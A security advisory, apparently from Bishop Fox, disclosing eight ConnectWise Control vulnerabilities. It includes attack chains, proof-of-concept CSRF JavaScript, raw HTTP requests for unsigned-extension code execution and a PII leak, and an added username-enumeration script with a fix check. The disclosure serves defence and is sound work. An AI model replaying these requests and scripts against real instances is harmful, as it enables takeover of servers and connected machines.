ConnectWise Control 19.3.25270.7185 - Eight Vulnerabilities, Including Critical
Introduction
Bishop Fox takes security seriously. In accordance with our Vulnerability Disclosure Policy, we follow the industry-standard responsible disclosure process. At the expiration of this time window, we disclose discovered vulnerabilities in our Security Bulletins and Advisories.
Read the technical details below to see if you’re affected.
One of our security researchers, Matt Hamilton (a Bishop Fox alumnus), discovered several vulnerabilities while conducting research on the ConnectWise Control product, an application that allows remote administration of endpoints. As part of our disclosure process, Bishop Fox proactively reached out to the vendor, ConnectWise, to help them understand the technical nature of the discovered vulnerabilities. During the research process, we read in news reports that ConnectWise products had been exploited in a ransomware attack in Texas. Without knowing whether the attack was facilitated by the vulnerabilities we discovered, Bishop Fox separately reached out to the Federal Bureau of Investigation and the local Texas field office to provide details on the discovered vulnerabilities in case this information could be of use to the investigation into the ransomware incident.
Chaining the vulnerabilities as described below would allow an attacker to execute arbitrary code on a victim’s Control server, as well as gain control of any client machines connected to a victim’s Control instance. What we discovered is consistent with the issues reported on by both CRN and ZDNet—however, this is not proof that the vulnerabilities we discovered were used in the incident. What we can say is that nothing we have read about the Texas ransomware attack so far rules out the possibility that these vulnerabilities were involved.
For example, Bishop Fox determined that multi-factor authentication (MFA) provides no mitigation for any of the vulnerabilities that we discovered. This is consistent with a reported statement by Rick Myers, the owner of the firm that provides MSP services to the affected sites, that “he is not sure if MFA would have made a difference in this case.” In the same article, CRN also reported:
Myers said he believes the attacks are being carried out on "several different levels" with an as-yet unidentified "issue" that is key to the Texas ransomware attack.
If true, this statement would suggest that the attackers used an attack chain involving multiple vulnerabilities, beyond an unsophisticated brute-force attack. Furthermore, with a code execution vulnerability present, it would be possible for a sophisticated attacker to cover their tracks, which makes attribution extremely difficult.
In a follow-up meeting with the vendor on September 25, 2019, ConnectWise CISO John Ford asserted that the Bishop Fox findings did not affect on-premise solutions and stated that these vulnerabilities are not exploitable because ConnectWise was unable to reproduce them using the steps that Bishop Fox provided them. Additionally, Mr. Ford raised the threat of a defamation lawsuit. But Bishop Fox’s research found vulnerabilities that do, in fact, impact on-premise installations.
Bishop Fox stands by our security researchers and believes in a fair and transparent process. In this particular case, we extended the disclosure timeline to give ConnectWise additional time to address these issues. ConnectWise has released multiple updates to the product since the initial discovery; however, the only vulnerability that appears to be addressed was the user enumeration vulnerability, and the release notes make no mention of the other security issues identified.
Read the Huntress Labs Blog: Validating the Bishop Fox Findings in ConnectWise Control at https://blog.huntresslabs.com/validating-the-bishop-fox-findings-in-connectwise-control-9155eec36a34
References
- https://www.zdnet.com/article/connectwise-warns-of-ongoing-ransomware-attacks-targeting-its-customers/
- https://www.crn.com/news/security/connectwise-tool-used-as-entry-point-in-texas-ransomware-attack
- https://www.crn.com/news/channel-programs/msp-at-center-of-texas-ransomware-hit-we-take-care-of-our-customers-
- https://docs.connectwise.com/ConnectWise_Control_Documentation/Release_notes
- https://www.channelfutures.com/mssp-insider/cybersecurity-roundup-msp-survives-ransomware-attack-via-connectwise-kaseya-tools
Advisory Summary
The following describes identified vulnerabilities in ConnectWise Control, formerly known as ScreenConnect, version 19.3.25270.7185.
Using the vulnerabilities documented in this disclosure, it was possible to create an attack chain that begins with coercing a SaaS user to visit an attacker-controlled website and ends with the complete takeover of the victim's ConnectWise Control instance. This includes the ability to execute arbitrary code on the Control server as well as the ability to connect to any client machine connected to the victim's Control instance.
Product Vendor | Product Name | Affected Version
ConnectWise, LLC | ConnectWise Control (SaaS); ConnectWise Control (self-hosted) | Current stable version, 19.3.25270.7185, and latest Canary, 19.4.25308.7190*
*Earlier versions are untested at the time of writing, but presumed to be vulnerable.
Product Description
ConnectWise Control is a remote desktop utility. The project's official website is https://connectwise.com/software/control. The latest version of the application at the time of this research is version 19.3.25270.7185, released on September 3, 2019.
Vulnerabilities List
Eight vulnerabilities were identified within the ConnectWise Control application:
- CROSS-SITE REQUEST FORGERY (CSRF)
- CROSS-SITE SCRIPTING (XSS)
- CROSS-ORIGIN RESOURCE SHARING (CORS) MISCONFIGURATION
- REMOTE CODE EXECUTION
- INFORMATION DISCLOSURE
- USER ENUMERATION
- MISSING SECURITY HEADERS
- INSECURE COOKIE SCOPE
Solution
Notify vendor.
Timeline
- Initial discovery: 09/13/2019
- Vulnerabilities submitted to MITRE for CVE number assignment: 9/18/2019
- Initial email contact with vendor (Frank DePrisco, Director, Identity & Data Security Operations; John Ford, CISO) with full disclosure; no response: 9/18/2019
- Multiple CVEs assigned: CVE-2019-16512, CVE-2019-16513, CVE-2019-16514, CVE-2019-16515, CVE-2019-16516, CVE-2019-16517 (CVE does not cover SaaS or cloud issues at this time): 9/19/2019
- Bishop Fox engaged vendor support chat to open a security ticket: 9/19/2019
- Vendor response for follow-up call: 9/19/2019
- Phone conference with vendor: 9/20/2019
- Bishop Fox reply to vendor: 9/23/2019
- Vendor follow-up meeting: 9/25/2019
- Vulnerability disclosed publicly: 1/22/2020
Credits
Matt Hamilton, Senior Security Analyst, Alumnus of Bishop Fox
Attack Chains
Code Execution on Control Server
Using the vulnerabilities disclosed in this document, it is possible for an attacker to execute arbitrary code on a victim's Control server using the steps outlined below:
- An attacker can create a JavaScript payload that exploits the lack of CSRF protection to upload an extension containing malicious code to the visitor’s instance if the visitor is an administrator.
- An attacker can load JavaScript into the victim's browser by coercing the victim to visit an attacker-controlled site or a SaaS instance under the attacker's control, exploiting the XSS vulnerability.
- Once the payload is executed in the victim's browser, the attacker can use the uploaded extension to execute arbitrary code on the victim's Control instance.
- An attacker able to execute arbitrary code on a SaaS Control server may have the ability to access any resources accessible to the instance itself, such as S3 buckets, EC2 instances, or other sensitive resources within the cloud environment that are reachable from the compromised server.
Connection to Any Client's Desktop
It is possible for an attacker to gain control of any client machines connected to a victim's Control instance using the steps below:
- An attacker can create a JavaScript payload that exploits the lack of CSRF protection, sending requests to endpoints on the visitor’s Control instance to collect the information necessary to build a client. This information includes a target client's session identifiers, Control instance public key, and signed tokens for the target identifiers.
- An attacker could load the malicious JavaScript into the victim's browser by coercing the victim to visit an attacker-controlled site or a SaaS instance under the attacker's control, exploiting the XSS vulnerability.
- Once the JavaScript is executed, it can exploit the lack of CSRF protection and the CORS misconfiguration to gather the necessary information and then construct a client connection.
- Optionally, the attacker could use Control functionality to silently execute code on the target client(s).
VULNERABILITIES
Cross-site Request Forgery (CSRF)
The ConnectWise Control cloud and user instances do not implement CSRF protection. If a user visited a third-party website while authenticated to the Control application, script running on the malicious website would be able to modify the user's Control account by sending API requests, without the knowledge of the victim Control user.
CVE ID | Security Risk | Impact | Access Vector
CVE-2019-16513 | Critical | Cross-site request forgery | Remote
Neither the Control cloud service nor customer instance APIs include CSRF-prevention tokens. This is a crucial security control that, if implemented, would prevent JavaScript on other domains from sending state-changing API requests on behalf of victim users.
The proof-of-concept JavaScript code below disables "suspicious account activity" email alerts when it runs in the browser of an authenticated Control user, regardless of which origin served it. Note that the JSON Content-Type causes the browser to send a CORS preflight first; the reflected-Origin CORS behavior described later in this advisory allows that preflight, so nothing prevents the request from completing:
//
// Disable "suspicious account activity" emails
//
var request = new XMLHttpRequest();
request.withCredentials = true; // attach the victim's Control session cookie
request.open('POST', 'https://cloud.screenconnect.co...');
request.setRequestHeader('Content-Type', 'application/json');
request.onload = function() { console.log(this.response); };
request.send('[false, false, false, false]');
FIGURE 1 - Proof-of-concept JavaScript code to disable "suspicious account activity" email notifications
This issue impacts both the ConnectWise Control cloud server and customer Control servers.
Cross-site Scripting (XSS)
The ConnectWise Control application is affected by a stored cross-site scripting vulnerability in the Appearance modifier. The vulnerability allowed a malicious instance administrator (for example, a malicious SaaS customer) to execute arbitrary JavaScript in the browsers of visitors to that instance.
CVE ID | Security Risk | Impact | Access Vector
CVE-2019-16512 | High | Code execution | Remote
Stored XSS was present in the Appearance modifier, which allowed an administrator of a given Control instance to add arbitrary HTML to the login page. Because the login page is served to unauthenticated visitors, this enables the administrator to conduct an XSS attack on any user who visits it.
Once this payload is added, anyone who visits the login page will execute the attacker-controlled JavaScript payload.
Only the LoginPanel.LoginReason.None.Message field was tested for XSS, as it was one of the few fields rendered on an unauthenticated page. It is likely that other Appearance fields are equally vulnerable.
Cross-Origin Resource Sharing (CORS) Misconfiguration
Both the ConnectWise Control cloud and customer instances were affected by a CORS misconfiguration, which reflected the Origin header provided by incoming requests. This allowed JavaScript running on any domain to interact with both the Control cloud and customer Control server APIs and perform administrative actions, such as signing session identifiers, without the victim's knowledge.
CVE ID | Security Risk | Impact | Access Vector
CVE-2019-16517 | High | Same-origin policy bypass | Remote, Context dependent
Requests sent using JavaScript on arbitrary websites to ConnectWise Control are explicitly allowed to read the response content, as the Origin header is improperly reflected in the Access-Control-Allow-Origin response header, as shown below:
Request
POST /Service/GetProfileInfo HTTP/1.1
Host: cloud.screenconnect.com
Origin: https://bishopfox.com
Response
HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: application/json; charset=utf-8
Expires: -1
Server: Control Server
Access-Control-Allow-Origin: https://bishopfox.com
This issue impacts both the ConnectWise Control cloud server and customer instances.
This vulnerability enables any site, regardless of its origin, to send credentialed requests to the Control API and read the resulting response.
Remote Code Execution
The ConnectWise Control server is vulnerable to a remote code execution vulnerability. Administrative users could upload an unsigned extension ZIP file containing executable code that is subsequently executed by the server.
CVE ID | Security Risk | Impact | Access Vector
CVE-2019-16514 | High | Code execution | Remote
Administrative users can upload extensions as Base64-encoded ZIP files, as shown below:
Request
POST /Services/ExtensionService.ashx/InstallExtension HTTP/1.1
Host: bishopfox.screenconnect.com
Content-Type: application/json
Content-Length: 1904
Origin: https://bishopfox.screenconnect.com
Connection: close
Cookie: CloudAuth=ug[REDACTED]A
["UEsDBA…omitted for brevity…AAA=="]
Response
HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 38
Content-Type: application/json; charset=utf-8
Access-Control-Allow-Origin: https://bishopfox.screenconnect.com
Access-Control-Allow-Credentials: true
Connection: close
"7f322b7b-d86c-4bc2-a6a6-111111111111"
When an extension is uploaded, its contents are accessible by forced browsing and are executed by the server even if the package is not signed. An attacker could navigate to the URL below, and the ArbitraryCode.ashx file in the extension's ZIP would be executed by the server despite not being signed:
https://bishopfox.screenconnect.com/App_Extensions/7f322b7b-d86c-4bc2-a6a6-111111111111/ArbitraryCode.ashx
FIGURE 4 - Uploaded extension executes arbitrary code when accessed directly
An attacker able to execute arbitrary code on a SaaS Control server may have the ability to access any resources accessible to the instance itself, such as S3 buckets, EC2 instances, or other sensitive resources within the cloud environment that are reachable from the compromised server.
Information Disclosure
The ConnectWise Control cloud service is affected by an information disclosure vulnerability that allows an unauthenticated attacker to reveal the administrator email address and postal code of an arbitrary customer Control instance.
CVE ID | Security Risk | Impact | Access Vector
Not assigned | Medium | Information disclosure | Remote
The /scripts/Service/GetScripts endpoint on cloud.screenconnect.com returns the personally identifiable information (PII) of the owner when an InstanceID is posted to the unauthenticated API, as shown below:
Request
POST /scripts/Service/GetScripts HTTP/1.1
Host: cloud.screenconnect.com
Content-Type: application/json
Content-Length: 25
Connection: close
[{"InstanceID":"a1q2qz"}]
Response
…omitted for brevity…
"codeContext":{"accountId":"urnce4","accountAttributes":248,"remainingEvaluationDays":11.0000,"accountCreationDate":"\/Date(1568488200000)\/","emailAddress":"[email protected]","country":"United States","postalCode":"94111","state":null,"orgType":"Other","instanceId":"a1q2qz","instanceAttributes":0,"currentLicenseType":"EVALUATION_ACCESS_PLUS-1903","currentLicenseCount":3,"regionId":"us4"}}]
This vulnerability is present only on the ConnectWise Control cloud server and does not affect self-hosted instances.
Due to the low entropy of the InstanceID value, it is also possible for an attacker to brute-force these values, resulting in a list of email addresses and postal codes of all ConnectWise Control SaaS customers.
User Enumeration
ConnectWise Control is vulnerable to a user enumeration vulnerability, allowing an unauthenticated attacker to determine with certainty if an account exists for a given username.
CVE ID | Security Risk | Impact | Access Vector
CVE-2019-16516 | Low | Information disclosure | Remote
When logging in, the authentication service's verbose X-Login-Result response header states explicitly whether the user exists. When a login is attempted for an account that does not exist, the header value UserNameInvalid is returned:
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 79247
Content-Type: text/html; charset=utf-8
P3P: CP="NON CUR OUR STP STA PRE"
X-Login-Result: UserNameInvalid
FIGURE 5 - Response to login request from nonexistent user
When a user attempts to log in as an account that does exist, but with an incorrect password, the header value PasswordInvalid is returned:
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 97237
Content-Type: text/html; charset=utf-8
P3P: CP="NON CUR OUR STP STA PRE"
X-Login-Result: PasswordInvalid
FIGURE 6 - Response of login request from existing user
By brute-forcing usernames and inspecting the response header, an attacker can create a list of target accounts that are known to exist. Note that the two responses above also differ in Content-Length (79247 versus 97237 bytes), so normalizing only the header value would leave a second oracle.
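The following is an added example, not ConnectWise code, of the enumeration the advisory describes and of a check that a fix actually closes the oracle. The login function is injected so the sample runs offline: vulnerableLogin is a constructed stand-in that answers with the header values and body sizes from Figures 5 and 6, fixedLogin is an assumed corrected server, and the account names, passwords and candidate list are constructed.

```javascript
// Added example (not ConnectWise code). The account table, candidate names,
// and the behaviour of both stand-in servers are constructed for illustration.

// Stand-in for the vulnerable server, mirroring FIGURE 5 and FIGURE 6: both
// the X-Login-Result header and the body size depend on whether the account exists.
const ACCOUNTS = new Map([['admin', 'hunter2'], ['helpdesk', 'correct horse']]);

function vulnerableLogin(user, password) {
  if (!ACCOUNTS.has(user)) {
    return { status: 200, headers: { 'x-login-result': 'UserNameInvalid', 'content-length': '79247' } };
  }
  if (ACCOUNTS.get(user) !== password) {
    return { status: 200, headers: { 'x-login-result': 'PasswordInvalid', 'content-length': '97237' } };
  }
  return { status: 302, headers: { location: '/Host' } };
}

// Assumed fix: every failed login gets the same header and the same body, so the
// response carries no information about account existence. Timing should be
// equalised as well, for example by always running the password hash.
function fixedLogin(user, password) {
  const ok = ACCOUNTS.has(user) && ACCOUNTS.get(user) === password;
  if (!ok) return { status: 200, headers: { 'x-login-result': 'LoginFailed', 'content-length': '79247' } };
  return { status: 302, headers: { location: '/Host' } };
}

// Enumeration as the advisory describes: one wrong-password attempt per name,
// keeping the names the server answers with PasswordInvalid.
function enumerateUsers(candidates, login) {
  const found = [];
  for (const user of candidates) {
    const res = login(user, 'not-the-password');
    if (res.headers['x-login-result'] === 'PasswordInvalid') found.push(user);
  }
  return found;
}

// Does a server still distinguish an existing account from a bogus one on a
// failed login? Compares status, the result header and the body size, because
// fixing only the header value leaves the size difference as an oracle.
function oracleRemains(login, existingUser, bogusUser) {
  const a = login(existingUser, 'not-the-password');
  const b = login(bogusUser, 'not-the-password');
  const fields = ['x-login-result', 'content-length'];
  return a.status !== b.status || fields.some(f => a.headers[f] !== b.headers[f]);
}

const CANDIDATES = ['admin', 'administrator', 'helpdesk', 'root', 'msp'];
```

Against the vulnerable stand-in, enumerateUsers recovers exactly the two existing accounts and oracleRemains reports true; against the fixed one it recovers nothing and oracleRemains reports false. Re-running oracleRemains after a vendor update is a quicker regression check than re-reading release notes.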
Missing Security Headers
The ConnectWise Control application does not send modern HTTP security headers, forgoing protections that browsers apply only when asked to, such as forcing HTTPS and restricting where scripts may load from.
CVE ID | Security Risk | Impact | Access Vector
CVE-2019-16515 | Low | Security headers | Remote
The following security headers are not implemented in the Control application:
Strict-Transport-Security (HSTS)
Content-Security-Policy (CSP)
This issue impacts both the ConnectWise Control cloud server and customer instances.
Insecure Cookie Scope
The ConnectWise Control authentication cookie, CloudAuth, is scoped to the parent domain, screenconnect.com. When a user visits a Control instance owned by a malicious SaaS customer, the user's CloudAuth token is sent to the malicious customer's SaaS instance.
CVE ID | Security Risk | Impact | Access Vector
Not assigned | Low | Other | Remote
Sending the CloudAuth token to all screenconnect.com subdomains may be viewed as an acceptable risk, as every host under that domain is operated by ConnectWise. However, if a malicious SaaS customer gains code execution on their own instance (as documented in this disclosure) or is otherwise able to read the content of incoming requests, they could take over the sessions of other SaaS customers who visit that instance.